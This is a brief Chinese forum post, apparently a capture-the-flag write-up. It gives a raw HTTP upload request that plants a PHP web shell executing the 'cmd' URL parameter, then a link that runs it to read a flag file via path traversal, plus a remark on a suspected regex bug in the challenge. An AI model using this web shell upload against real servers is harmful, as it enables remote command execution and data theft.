贴上传请求报文
POST /index.php HTTP/1.1
Host: 47.102.223.17:2333
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=--------361693857
Content-Length: 183
----------361693857
Content-Disposition: form-data; name="file";filename="1.php"
content-type:text/php
{"asd":"<?php $cmd = $_GET['cmd'];echo `$cmd`;?>"}
----------361693857--
访问链接
http://47.102.223.17:2333/upload/1833916211.php?cmd=cat%20../../../../flag
另外怀疑是不是题目出错了,正则表达式这块出现问题
匹配不到字符
删除首尾/后成功匹配
[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!
最后于 2020-5-2 11:33
被会飞的锅编辑
,原因: 上传图片